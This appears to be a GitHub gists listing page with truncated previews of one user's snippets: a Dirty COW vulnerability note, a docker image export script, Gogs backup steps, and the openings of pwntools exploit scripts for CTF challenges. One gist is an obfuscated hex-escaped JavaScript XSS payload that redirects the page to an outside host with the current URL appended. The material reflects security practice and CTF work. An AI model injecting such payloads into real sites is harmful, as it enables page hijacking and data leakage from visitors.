Debian Linux Jessie 3.16.36-1+deb8u1 is vulnerable to Dirty COW (CVE-2016-5195).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| OUTPUT="images/linuxkit.tar" | |
| IMG_REGEX="/^(linuxkit)/" | |
| IMG_IDS=$(docker images | awk '{if ($1 ~ '${IMG_REGEX}') print $3}') | |
| docker save ${IMG_IDS} -o ${OUTPUT} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <p>[][`\x66\x69\x6c\x74\x65\x72`][`\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72`]`\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x66\x72\x2f\x3f\x27\x2b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e``` |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MariaDB [(none)]> SHOW DATABASES; | |
| +--------------------+ | |
| | Database | | |
| +--------------------+ | |
| | app | | |
| | information_schema | | |
| | mysql | | |
| | performance_schema | | |
| +--------------------+ | |
| 4 rows in set (0.00 sec) |
- Create a
backupuser on your Gogs server - Add this
backupuser as read-only collaborator to the projects that you want to backup - Generate a token for this user (here)
- Update configuration of the script (especially
BACKUP_DIRECTORY,BACKUP_USERNAME,BACKUP_TOKEN,API_BASE_URLandGIT_HOST) - Run the script
- (Optionally) add this script to your
crontaborrsnapshot.conf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export TMP=$(mktemp -d) | |
| /bin/cat <<-EOF >${TMP}/exploit.py | |
| #!/usr/bin/env python | |
| # -*- coding:Utf-8 -*- | |
| #==========================================================# | |
| # [+] Title: Exploitation code for Protostar format 0 # | |
| # [+] Author: Baptiste M. (Creased) # | |
| # [+] Website: bmoine.fr # |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| from pwn import * | |
| context.log_level = 'info' | |
| PROMPT = '>>> ' | |
| def get_con(): | |
| p = remote('ctf.bzh', 11000) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Doc: docs.pwntools.com/en/stable/ | |
| context.log_level = 'debug' # debug/info/error/warning. | |
| context.arch = 'i386' # i386/x64/arm, etc. | |
| ## OPEN SOCKET. | |
| sock = remote('challenges.ecsc-teamfrance.fr', 2000) | |
| ## OR, OPEN LOCAL PROCESS. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.clear(arch='amd64', log_level='info') | |
| PROMPT = b'peterpan@pwnuser:~$ ' | |
| LOCAL = False | |
| p = None | |
| def create_process(): |